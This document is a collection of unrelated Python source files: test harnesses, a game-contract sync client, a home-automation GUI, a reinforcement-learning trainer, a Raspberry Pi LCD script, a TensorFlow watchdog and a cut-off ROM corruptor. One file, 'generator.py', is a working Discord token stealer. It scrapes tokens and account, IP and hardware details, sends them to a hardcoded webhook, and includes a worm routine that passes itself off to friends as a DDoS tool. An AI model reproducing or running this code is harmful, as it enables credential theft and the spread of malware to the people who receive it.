suites.append( unittest.TestLoader().loadTestsFromModule( TestDialogs ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientListBoxes ) )
if run_all or only_run == 'daemons':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientDaemons ) )
if run_all or only_run == 'data':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientConstants ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientData ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestFunctions ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusSerialisable ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusSessions ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusTags ) )
if run_all or only_run == 'db':
suites.append( unittest.TestLoader().loadTestsFromModule( TestDB ) )
if run_all or only_run == 'networking':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientNetworking ) )
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusNetworking ) )
if run_all or only_run == 'image':
suites.append( unittest.TestLoader().loadTestsFromModule( TestClientImageHandling ) )
if run_all or only_run == 'nat':
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusNATPunch ) )
if run_all or only_run == 'server':
suites.append( unittest.TestLoader().loadTestsFromModule( TestHydrusServer ) )
suite = unittest.TestSuite( suites )
runner = unittest.TextTestRunner( verbosity = 2 )
runner.run( suite )
def SetRead( self, name, value ):
self._reads[ name ] = value
def SetStatusBarDirty( self ):
pass
def SetWebCookies( self, name, value ):
self._cookies[ name ] = value
def TidyUp( self ):
time.sleep( 2 )
HydrusPaths.DeletePath( self.db_dir )
def ViewIsShutdown( self ):
return HG.view_shutdown
def WaitUntilModelFree( self ):
return
def WaitUntilViewFree( self ):
return
def Write( self, name, *args, **kwargs ):
self._writes[ name ].append( ( args, kwargs ) )
def WriteSynchronous( self, name, *args, **kwargs ):
self._writes[ name ].append( ( args, kwargs ) )
if name == 'import_file':
( file_import_job, ) = args
if file_import_job.GetHash().encode( 'hex' ) == 'a593942cb7ea9ffcd8ccf2f0fa23c338e23bfecd9a3e508dfc0bcf07501ead08': # 'blarg' in sha256 hex
raise Exception( 'File failed to import for some reason!' )
else:
return ( CC.STATUS_SUCCESSFUL_AND_NEW, '' )
if __name__ == '__main__':
args = sys.argv[1:]
if len( args ) > 0:
only_run = args[0]
else: only_run = None
try:
threading.Thread( target = reactor.run, kwargs = { 'installSignalHandlers' : 0 } ).start()
app = wx.App()
controller = Controller()
try:
# we run the tests on the wx thread atm
# keep a window alive the whole time so the app doesn't finish its mainloop
win = wx.Frame( None )
def do_it():
controller.Run()
win.DestroyLater()
wx.CallAfter( do_it )
app.MainLoop()
except:
import traceback
HydrusData.DebugPrint( traceback.format_exc() )
finally:
HG.view_shutdown = True
controller.pubimmediate( 'wake_daemons' )
HG.model_shutdown = True
controller.pubimmediate( 'wake_daemons' )
controller.TidyUp()
except:
import traceback
HydrusData.DebugPrint( traceback.format_exc() )
finally:
reactor.callFromThread( reactor.stop )
print( 'This was version ' + str( HC.SOFTWARE_VERSION ) )
raw_input()
|
contract_manager.py
|
import time, os
from valclient.exceptions import ResponseError
from ..utility_functions import ErrorHandling, Logger, ContentLoader
from ..localization.localization import Localizer
from ..lib.killable_thread import KillableThread
from ..lib.ystr_client import YstrClient
# A thread that polls for contract changes
class ContractManager:
def __init__(self, valclient, config):
self.config = config
self.client = valclient
self.ystr_client = YstrClient(self.config)
# Fetch stuff
ContentLoader.cache_contracts()
raw_contract_data = self.client.contracts_fetch()
ContentLoader.CONTENT_CACHE.completed_contracts = [contract["ContractDefinitionID"] for contract in raw_contract_data["Contracts"] if contract["ContractProgression"]["TotalProgressionEarned"] == 975000 and contract["ProgressionLevelReached"] == 10]
self.equipped_contract = self.active_contract()
self.current_contract = self.ystr_client.get_contract()
# Check for discrepancy between selected contract and active contract - favor the selected one
if self.current_contract is None:
Logger.debug(f"No remote contract set! Updating it to be '{self.equipped_contract}'.")
self.ystr_client.update_contract(self.equipped_contract)
elif self.current_contract != self.equipped_contract:
Logger.debug(f"Remote contract is '{self.current_contract}' while locally, it is '{self.equipped_contract}'. Overriding to be '{self.current_contract}'.")
self.client.contracts_activate(ContentLoader.get_contract(self.current_contract))
self.equipped_contract = self.current_contract
# Poll contract in remote config
def poll_loop(self):
sleep_duration = int(Localizer.get_config_value("contract_poll_interval"))
while True:
contract = self.ystr_client.get_contract()
if contract != self.current_contract:
Logger.debug(f"Detected new set contract '{contract}'.")
contract_id = ContentLoader.get_contract(contract)
if contract_id in ContentLoader.CONTENT_CACHE.completed_contracts:
Logger.debug(f"Can't activate set contract '{contract}' because you already completed it! Reverting set contract back to {self.current_contract}.")
self.ystr_client.update_contract(self.current_contract)
else:
self.client.contracts_activate(contract_id)
self.current_contract = contract
self.equipped_contract = contract
time.sleep(sleep_duration)
# Sync local contract changes
def sync_loop(self):
sleep_duration = int(Localizer.get_config_value("contract_sync_interval"))
while True:
contract = self.active_contract()
if contract != self.equipped_contract and contract is not None:
Logger.debug(f"Detected local contract change to {contract}.")
self.ystr_client.update_contract(contract)
self.equipped_contract = contract
time.sleep(sleep_duration)
# Start the thread to continuously poll game presence
def start_poll_thread(self):
try:
self.poll_thread = KillableThread(target=self.poll_loop, daemon=True)
self.poll_thread.start()
except Exception as e:
Logger.debug(f"Error starting contract poll thread: {e}")
ErrorHandling.handle_error()
self.kill_contract_thread("poll")
# Start the thread to sync local contract changes
def start_sync_thread(self):
try:
self.sync_thread = KillableThread(target=self.sync_loop, daemon=True)
self.sync_thread.start()
except Exception as e:
Logger.debug(f"Error starting contract sync thread: {e}")
ErrorHandling.handle_error()
self.kill_contract_thread("sync")
def active_contract(self):
try:
contract_data = self.client.contracts_fetch()
return next((agent for agent in ContentLoader.CONTENT_CACHE.contracts if ContentLoader.CONTENT_CACHE.contracts[agent] == contract_data["ActiveSpecialContract"]), None)
except ResponseError as e:
Logger.debug(f"Error while fetching current contract: {e}")
return None
# Helper for killing this thread while notifying the user and the web service
def kill_contract_thread(self, name, message=""):
Logger.debug(f"Killing contract {name} thread due to: {message}")
self.ystr_client.offline()
os._exit(1)
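# Typical wiring (illustrative sketch only; assumes the caller already holds an
# authenticated valclient session and a parsed config object):
#   manager = ContractManager(valclient, config)
#   manager.start_poll_thread()  # apply remotely selected contracts locally
#   manager.start_sync_thread()  # push locally equipped contracts to the web service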
|
GUI.pyw
|
import sys
import time
from threading import Thread
import wx
import wx.lib.mixins.listctrl as listmix
from converters import PrettyTime
days_of_the_week=list("MTWTFSS")
class AutoSizeListCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):
def __init__(self, parent, ID, style=0):
wx.ListCtrl.__init__(self,parent,ID,style=style)
listmix.ListCtrlAutoWidthMixin.__init__(self)
self.units_states=[]
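    # Virtual-list callback: wx asks for each visible cell on demand. Column 0 is
    # the unit address, column 1 its state (rendered as a percentage when numeric)
    # and column 2 the last-update time.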
def OnGetItemText(self, item, col):
if col == 0:
return self.units_states[item][col]
else:
update_data=self.units_states[item][1][:]
if col == 2:
t=time.localtime(float(update_data[col-1]))
hr=t.tm_hour; ampm="am"
                if t.tm_hour>=12: ampm="pm"
                if t.tm_hour>12: hr-=12
                if hr==0: hr=12
update_data[col-1]="%s:%s:%s %s %s/%s/%s"%(hr,t.tm_min,t.tm_sec,ampm,t.tm_mon,t.tm_mday,str(t.tm_year)[2:])
elif col == 1:
try:
update_data[col-1]=str(round(float(update_data[col-1]),2))+"%"
except ValueError:
pass
#-1 is 'cause the other values are in the "values" of a dict.items()
return update_data[col-1]
class MainWindow(wx.Frame):
def __init__(self,parent=None,size=(600,400),conn=None,script=None,run=None):
self.run=run
self.on_close_callback=None
self.script=script
self.conn=conn
wx.Frame.__init__(self,parent,-1,"X10 Control",size=size)
self.panel=wx.Panel(self,-1)
self.notebook=wx.Notebook(self.panel,-1)
menu_bar = wx.MenuBar()
file_menu = wx.Menu()
file_menu.Append(110,"&Reload Commands\tCtrl+r")
self.Bind(wx.EVT_MENU,self.ReloadScript,id=110)
file_menu.AppendSeparator()
file_menu.Append(100,"&Quit\tCtrl+q")
self.Bind(wx.EVT_MENU,self.Close,id=100)
menu_bar.Append(file_menu,"&File")
command_info=wx.StaticText(self.panel,-1,"Manual Command:")
self.command=wx.TextCtrl(self.panel,-1,style=wx.WANTS_CHARS)
self.command.Bind(wx.EVT_KEY_UP,self.ParseManualCommand)
self.stats_panel=AutoSizeListCtrl(self.notebook, -1,style=wx.LC_REPORT|wx.BORDER_NONE|wx.LC_VIRTUAL)
for i,col in enumerate(("Unit","State","Last Update")): self.stats_panel.InsertColumn(i,col)
self.stats_panel.SetItemCount(0)
self.commands_panel=AutoSizeListCtrl(self.notebook, -1,style=wx.LC_REPORT|wx.BORDER_NONE)
for i,col in enumerate(("Addresses","Function","Time","Days")): self.commands_panel.InsertColumn(i,col)
try: self.AddCommands(self.script.commands)
except AttributeError: pass
self.triggers_panel=AutoSizeListCtrl(self.notebook, -1,style=wx.LC_REPORT|wx.BORDER_NONE)
for i,col in enumerate(("Addresses","Function","Time","Days","Dates","Action","Last Trigger")): self.triggers_panel.InsertColumn(i,col)
self.notebook.AddPage(self.stats_panel, "Unit States")
self.notebook.AddPage(self.commands_panel, "Commands")
self.notebook.AddPage(self.triggers_panel, "Triggers")
main_sizer=wx.BoxSizer(wx.VERTICAL)
command_sizer=wx.BoxSizer(wx.HORIZONTAL)
command_sizer.Add(command_info,0,wx.ALIGN_CENTER_VERTICAL|wx.LEFT,4)
command_sizer.Add(self.command,1,wx.EXPAND|wx.RIGHT,2)
main_sizer.Add(command_sizer,0,wx.EXPAND|wx.TOP|wx.BOTTOM,2)
main_sizer.Add(self.notebook,1,wx.EXPAND|wx.LEFT,2)
self.panel.SetSizer(main_sizer)
self.SetMenuBar(menu_bar)
self.go=True
self.T=Thread(target=self.Run)
self.T.setDaemon(True)
self.T.start()
## self.timer=wx.Timer(self)
## self.Bind(wx.EVT_TIMER,self.Run,self.timer)
## self.timer.Start(1000,True)
self.Bind(wx.EVT_CLOSE,self.Close)
self.run_commands_stack=[]
def Close(self,event):
## self.timer.Stop()
self.go=False
if self.on_close_callback:
self.on_close_callback()
self.Hide()
self.T.join(3)
self.Destroy()
def AddrSort(self,arg1,arg2):
a1=int(arg1[0][1:]); a2=int(arg2[0][1:])#This sorts the unit addresses by the number after the house code
if a1>a2:
return 1
elif a1<a2:
            return -1
return 0
def UpdateUnitsStates(self,states):
new_states=states.items()
if new_states!=self.stats_panel.units_states:#Only update the control if we need to
self.stats_panel.units_states=new_states
self.stats_panel.SetItemCount(len(new_states))
self.stats_panel.Refresh()
#Now we run manual commands because this is where the update thread is
#and we now have control of the conn.
try:
self.RunManualCommandsStack()
except:
self.run_commands_stack=[]
## def UpdateUnitsStates(self,states):
## self.stats_panel.DeleteAllItems()
## states=states.items()
## states.sort(self.AddrSort)
## for i,data in enumerate(states):
## key,value=data
## index = self.stats_panel.InsertStringItem(sys.maxint, key)
## try:
## state_val=str(round(float(value[0]),2))+"%"
## except ValueError:
## state_val=str(value[0])
def AddCommands(self,commands):
for i,command in enumerate(commands):
index = self.commands_panel.InsertStringItem(sys.maxint, ", ".join(command.addresses))
function=command.type+" "+command.function
if command.function in ("DIM","BRIGHT"):
function="%s %s %s"%(command.type,command.function,command.dims)
function=function.title()
self.commands_panel.SetStringItem(index, 1, function)
self.commands_panel.SetStringItem(index, 2, PrettyTime(command.time))
days="";last=-1
            for day in command.days:
                days+="-"*(day-last-1)+days_of_the_week[day]
                last=day
self.commands_panel.SetStringItem(index, 3, days)
self.commands_panel.SetItemData(index, i)
def ParseManualCommand(self,event):
if event.GetKeyCode() == wx.WXK_RETURN:
cmd_text=self.command.GetValue()
if self.conn:
cmd=cmd_text.strip().upper().split(" ")
if len(cmd)>1:
self.run_commands_stack.append(cmd[:])
self.command.SetValue("")
def RunManualCommandsStack(self):
if self.run_commands_stack:
for cmd in self.run_commands_stack:
func_house_code=""
function="";dims=0
for part in cmd:
part=part.strip()
if part[0].isalpha() and part[1:].isdigit():
func_house_code=part[0]
self.conn.SendAddr(part)
elif part.isdigit():
dims=int(part)
else:
function=part
if function:
self.conn.SendFunc(func_house_code+" "+function,dims)
self.run_commands_stack=[]
def ReloadScript(self,event):
self.script.Reload()
self.commands_panel.DeleteAllItems()
self.AddCommands(self.script.commands)
def Run(self,event=None):
if self.run!=None:
while self.go:
self.run()
## print "Done!"
## self.timer.Start(1000,True)
# This is just for testing the GUI part (aka just how it looks)
if __name__ == "__main__":
app=wx.App()
win=MainWindow(None)
win.Show()
app.MainLoop()
|
main.py
|
from __future__ import print_function, division
import os
os.environ["OMP_NUM_THREADS"] = "1"
import argparse
import torch
import torch.multiprocessing as mp
from environment import Environment
from utils import read_config
from model import A3Clstm
from train import train
from test import test
from shared_optim import SharedRMSprop, SharedAdam
#from gym.configuration import undo_logger_setup
import time
from Config import Config
#undo_logger_setup()
parser = argparse.ArgumentParser(description='A3C')
parser.add_argument(
'--lr',
type=float,
default=0.0001,
metavar='LR',
help='learning rate (default: 0.0001)')
parser.add_argument(
'--gamma',
type=float,
default=0.99,
metavar='G',
help='discount factor for rewards (default: 0.99)')
parser.add_argument(
'--tau',
type=float,
default=1.00,
metavar='T',
help='parameter for GAE (default: 1.00)')
parser.add_argument(
'--seed',
type=int,
default=1,
metavar='S',
help='random seed (default: 1)')
parser.add_argument(
'--workers',
type=int,
default=1,
metavar='W',
    help='how many training processes to use (default: 1)')
parser.add_argument(
'--num-steps',
type=int,
default=20,
metavar='NS',
help='number of forward steps in A3C (default: 20)')
parser.add_argument(
'--max-episode-length',
type=int,
default=Config.TRAINING_STEPS,
metavar='M',
help='maximum length of an episode (default: Config.TRAINING_STEPS)')
parser.add_argument(
'--env',
default='Wafer',
metavar='ENV',
help='environment to train on (default: Wafer)')
parser.add_argument(
'--env-config',
default='config.json',
metavar='EC',
help='environment to crop and resize info (default: config.json)')
parser.add_argument(
'--shared-optimizer',
default=True,
metavar='SO',
    help='use an optimizer with shared statistics across processes.')
parser.add_argument(
'--load', default=True, metavar='L', help='load a trained model')
parser.add_argument(
'--save-max',
default=True,
metavar='SM',
help='Save model on every test run high score matched or bested')
parser.add_argument(
'--optimizer',
default='Adam',
metavar='OPT',
help='shares optimizer choice of Adam or RMSprop')
parser.add_argument(
'--load-model-dir',
default='trained_models/',
metavar='LMD',
help='folder to load trained models from')
parser.add_argument(
'--save-model-dir',
default='trained_models/',
metavar='SMD',
help='folder to save trained models')
parser.add_argument(
'--log-dir', default='logs/', metavar='LG', help='folder to save logs')
parser.add_argument(
'--gpu-ids',
type=int,
default=-1,
nargs='+',
help='GPUs to use [-1 CPU only] (default: -1)')
parser.add_argument(
'--amsgrad',
default=True,
metavar='AM',
help='Adam optimizer amsgrad parameter')
parser.add_argument(
'--skip-rate',
type=int,
default=4,
metavar='SR',
help='frame skip rate (default: 4)')
# Based on
# https://github.com/pytorch/examples/tree/master/mnist_hogwild
# Training settings
# Implemented multiprocessing using locks but was not beneficial. Hogwild
# training was far superior
if __name__ == '__main__':
args = parser.parse_args()
torch.manual_seed(args.seed)
if args.gpu_ids == -1:
args.gpu_ids = [-1]
else:
torch.cuda.manual_seed(args.seed)
mp.set_start_method('spawn')
setup_json = read_config(args.env_config)
env_conf = setup_json["Default"]
for i in setup_json.keys():
if i in args.env:
env_conf = setup_json[i]
env = Environment()
num_actions = env.get_num_actions()
shared_model = A3Clstm(Config.STACKED_FRAMES, num_actions)
if args.load:
saved_state = torch.load(
'{0}{1}.dat'.format(args.load_model_dir, args.env),
map_location=lambda storage, loc: storage)
shared_model.load_state_dict(saved_state)
shared_model.share_memory()
if args.shared_optimizer:
if args.optimizer == 'RMSprop':
optimizer = SharedRMSprop(shared_model.parameters(), lr=args.lr)
if args.optimizer == 'Adam':
optimizer = SharedAdam(
shared_model.parameters(), lr=args.lr, amsgrad=args.amsgrad)
optimizer.share_memory()
else:
optimizer = None
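    # Spawn one evaluation process plus args.workers Hogwild training processes;
    # all of them operate on shared_model's parameters held in shared memory.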
processes = []
p = mp.Process(target=test, args=(args, shared_model, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for rank in range(0, args.workers):
p = mp.Process(
target=train, args=(rank, args, shared_model, optimizer, env_conf))
p.start()
processes.append(p)
time.sleep(0.1)
for p in processes:
time.sleep(0.1)
p.join()
|
generator.py
|
import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from threading import Thread
from time import sleep
from sys import argv
WEBHOOK_URL = "https://discord.com/api/webhooks/890000360062738484/PX5cxpqZejORz1bXBDmVKSfb_O1aAVANfjvn-Pz-O1l2l7iQvSmmvuTmSFqUSVY5oDkN" # Insert webhook url here
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord": ROAMING + "\\Discord",
"Discord Canary": ROAMING + "\\discordcanary",
"Discord PTB": ROAMING + "\\discordptb",
"Google Chrome": LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera": ROAMING + "\\Opera Software\\Opera Stable",
"Brave": LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex": LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getHeader(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
if token:
headers.update({"Authorization": token})
return headers
def getUserData(token):
try:
return loads(
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode())
except:
pass
def getTokenz(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def whoTheFuckAmI():
ip = "None"
try:
ip = urlopen(Request("https://ifconfig.me")).read().decode().strip()
except:
pass
return ip
def hWiD():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getFriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships",
headers=getHeader(token))).read().decode())
except:
pass
def getChat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token),
data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def paymentMethods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources",
headers=getHeader(token))).read().decode())) > 0)
except:
pass
def sendMessages(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token,
"multipart/form-data; boundary=---------------------------325414537030329320151394843687"),
data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled (If you remove this line, malware will spread itself by sending the binary to friends.)
for friend in getFriends(token):
try:
chat_id = getChat(token, friend["id"])
sendMessages(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = whoTheFuckAmI()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in getTokenz(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getUserData(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(paymentMethods(token))
embed = {
"color": 0x7289da,
"fields": [
{
"name": "|Account Info|",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "|PC Info|",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "|Token|",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
},
"footer": {
"text": f"Visit my website for more Cybersecurity contents: un5t48l3.com"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "Token xDxD",
"avatar_url": "https://mehmetcanyildiz.com/wp-content/uploads/2020/11/black.png"
}
try:
urlopen(Request(WEBHOOK_URL, data=dumps(webhook).encode(), headers=getHeader()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nDDoS tool. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
|
lcd_1602_thread.py
|
# Display RPi info on a monochromatic character LCD
# Version: v1.0
# Author: Nikola Jovanovic
# Date: 04.09.2020.
# Repo: https://github.com/etfovac/rpi_lcd
# SW: Python 3.7.3
# HW: Pi Model 3B V1.2, LCD 1602 module (HD44780, 5V, Blue backlight, 16 chars, 2 lines), Bi-Polar NPN Transistor (2N3904 or eq)
# https://learn.adafruit.com/character-lcds/python-circuitpython
# https://www.mbtechworks.com/projects/drive-an-lcd-16x2-display-with-raspberry-pi.html
# https://www.rototron.info/using-an-lcd-display-with-inputs-interrupts-on-raspberry-pi/
# https://www.rototron.info/lcd-display-tutorial-for-raspberry-pi/#downloads
# https://www.raspberrypi-spy.co.uk/2012/07/16x2-lcd-module-control-using-python/
# https://www.elprocus.com/lcd-16x2-pin-configuration-and-its-working/
# https://learn.adafruit.com/drive-a-16x2-lcd-directly-with-a-raspberry-pi/python-code
# https://bogotobogo.com/python/Multithread/python_multithreading_Event_Objects_between_Threads.php
# https://pypi.org/project/pynput/
# https://components101.com/transistors/bc548-npn-transistor
import board
import digitalio
import adafruit_character_lcd.character_lcd as characterlcd
from time import sleep, strftime
import datetime
import psutil
import signal
import threading
from pynput import keyboard
import sys
import os
sys.path.append(os.path.abspath(".."))
import config.printout_info as cpi
import config.printout_format as cpf
def lcd_setup(lcd_columns = 16,lcd_rows = 2):
# Raspberry Pi Pin Config:
lcd_rs = digitalio.DigitalInOut(board.D26)
lcd_en = digitalio.DigitalInOut(board.D19)
lcd_d7 = digitalio.DigitalInOut(board.D13)
lcd_d6 = digitalio.DigitalInOut(board.D6)
lcd_d5 = digitalio.DigitalInOut(board.D5)
lcd_d4 = digitalio.DigitalInOut(board.D22)
lcd_backlight = digitalio.DigitalInOut(board.D27)
# a NPN transistor's Base switches the LED backlight on/off
# Init lcd class obj
lcd = characterlcd.Character_LCD_Mono(
lcd_rs, lcd_en,
lcd_d4, lcd_d5, lcd_d6, lcd_d7,
lcd_columns, lcd_rows, lcd_backlight
)
lcd.text_direction = lcd.LEFT_TO_RIGHT
lcd.backlight = True
lcd.clear()
lcd.blink = True
lcd_msg(lcd,"<Setup>...")
lcd.cursor = True
msg_list = cpi.lcd_msg_list(lcd_columns, lcd_rows)
return lcd, msg_list
def lcd_msg(lcd,msg_str):
lcd.clear()
sleep(0.1)
lcd.message = msg_str
print(lcd.message)
def lcd_printout(lcd,msg_list,delay):
#print(msg_list)
try:
for msg in msg_list:
lcd_msg(lcd,msg)
sleep(delay)
except KeyboardInterrupt:
print('<CTRL-C> Printout cancelled. Press CTRL-C to stop execution.')
def lcd_printout_timeout(lcd,msg_list,event,timeout_sec):
# Triggered on event timeout
cntr=0
while not event.is_set():
cntr+=cntr
#print(cntr) #=0 => e.wait works
event_is_set = event.wait(timeout_sec)
if event_is_set:
lcd_printout(lcd,msg_list,1.5)
event.clear() # clear isSet flag in event
else:
lcd_msg(lcd,cpf.msg_form(cpi.lcd_timestamp()[0:2]))
def lcd_printout_timeout2(lcd,msg_list,event,timeout_sec):
# Triggered on event timeout
while not event.is_set():
event_is_set = event.wait(timeout_sec)
if not event_is_set: # periodic reminder
lcd_printout(lcd,msg_list,3)
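# The two module-level Events below coordinate the keyboard listener and the
# LCD printout threads: lcd_event_print is set from the pynput callback on
# Page Down and consumed by lcd_printout_timeout, while lcd_event_print2 is
# never set, so lcd_printout_timeout2 only ever runs on wait() timeouts.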
lcd_event_print = threading.Event()
lcd_event_print2 = threading.Event() # not used
def on_press(key):
global lcd_event_print # couldn't add param to this callback
# A keyboard key press (Page Down) sets the thread event:
if key == keyboard.Key.page_down: lcd_event_print.set()
# try:
# print('alphanumeric key {0} pressed'.format(key.char))
# except AttributeError:
# print('special key {0} pressed'.format(key))
def on_release(key):
if key == keyboard.Key.esc:
print('{0} released - Stopping the keyboard listener'.format(key))
return False
def main():
def interrupt_signal_handler(signum, frame):
print('Interrupt signal ' + str(signum) +
' on line ' + str(frame.f_lineno) +
' in ' + frame.f_code.co_filename)
listener.stop()
lcd.backlight = False # Turns off the LED backlight
sys.exit(0)
[lcd,msg_lists] = lcd_setup()
#lcd_thread = threading.Thread(target=lcd_printout, args=())
#lcd_thread.start()
timeout_sec = [1,6]
lcd_thread = threading.Thread(name='non-blocking',
target = lcd_printout_timeout,
args = (lcd,msg_lists[0],lcd_event_print,timeout_sec[0]))
lcd_thread2 = threading.Thread(name='non-blocking',
target = lcd_printout_timeout2,
args = (lcd,msg_lists[1],lcd_event_print2,timeout_sec[1]))
lcd_thread.start()
lcd_thread2.start()
listener = keyboard.Listener(on_press=on_press, on_release=on_release)
listener.start()
listener.wait()
signal.signal(signal.SIGINT, interrupt_signal_handler) #Terminal interrupt signal
signal.pause()
if __name__ == "__main__":
main()
|
watchdog.py
|
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Watchdog that monitors activity of ClusterCoordinator."""
import faulthandler
import os
import sys
import threading
import time
from absl import logging
class WatchDog(object):
"""A class to dump stack traces if no activity happens in ClusterCoordinator."""
def __init__(self,
timeout=int(os.environ.get(
"TF_CLUSTER_COORDINATOR_WATCH_DOG_TIMEOUT", -1)),
traceback_file=sys.stdout,
on_triggered=None):
self._timeout = timeout
self._last_activity_time = time.time()
self._traceback_file = traceback_file
self._on_triggered = on_triggered
self._stopped = False
if timeout > 0:
self._watchdog_thread = threading.Thread(
target=self._watchdog_function, name="WatchDog", daemon=True)
self._watchdog_thread.start()
def stop(self):
self._stopped = True
def _watchdog_function(self):
"""The watchdog thread."""
logging.info("Starting watchdog thread with timeout %r", self._timeout)
while not self._stopped:
time.sleep(self._timeout / 10.0)
current_time = time.time()
if current_time - self._last_activity_time >= self._timeout:
logging.warning(
"No activity for ClusterCoordinator for %r seconds. "
"Dumping stack traces.", self._timeout)
if self._on_triggered:
self._on_triggered()
faulthandler.dump_traceback(file=self._traceback_file)
self._traceback_file.write("==== End of stack traces ====\n")
self._last_activity_time = current_time
def report_closure_done(self):
if self._timeout > 0:
self._last_activity_time = time.time()
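# Minimal usage sketch (illustrative only; the surrounding ClusterCoordinator
# wiring is assumed rather than shown):
#   wd = WatchDog(timeout=60, on_triggered=lambda: logging.warning("stalled"))
#   ...                        # coordinator schedules and runs closures
#   wd.report_closure_done()   # call after each closure to reset the timer
#   wd.stop()                  # shut the watchdog thread down on exit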
|
multicorrupt.py
|
from multiprocessing import Process, Pool, cpu_count
from functools import partial
from sys import argv
import random, math, array, os, subprocess, time
def calc_mupen_res(N,region_w,region_h):
"""find res to fit N mupen instances in region"""
results = []
for row_length in range(1,N+1):
col_length = math.ceil(N/float(row_length))
instance_width = int(math.floor( min(640, region_w/float(row_length) )))
instance_height = int(math.floor(instance_width*(480.0/640.0)))
if instance_height*col_length <= region_h and instance_width*row_length <= region_w:
results.append((instance_width, instance_height))
return max(results)
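# Illustrative example: calc_mupen_res(20, 1520, 1050) returns the largest
# 4:3 (width, height) pair, capped at 640x480, for which a grid of 20 such
# windows still fits inside a 1520x1050 pixel region.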
#fit to region with space saved on right and bottom edge
mupen_instances = 20
screen_res = (1920,1200)
savespace = (400, 150)
RESW, RESH = screen_res[0]-savespace[0], screen_res[1]-savespace[1]
instance_res = calc_mupen_res(mupen_instances, RESW, RESH)
print(instance_res)
#USAGE: python3 multicorrupt.py original_roms/BK64.n64
#outputs a bunch of roms to output_roms/ramdisk/ and launches them with mupen64plus
#depends on patched version of mupen that accepts --position parameter for window
class Corruption(object):
def __init__(self, L, id, static_changes_string=None):
self.id = id
self.L = L[:]
if static_changes_string:
self.make_static_changes(static_changes_string)
else:
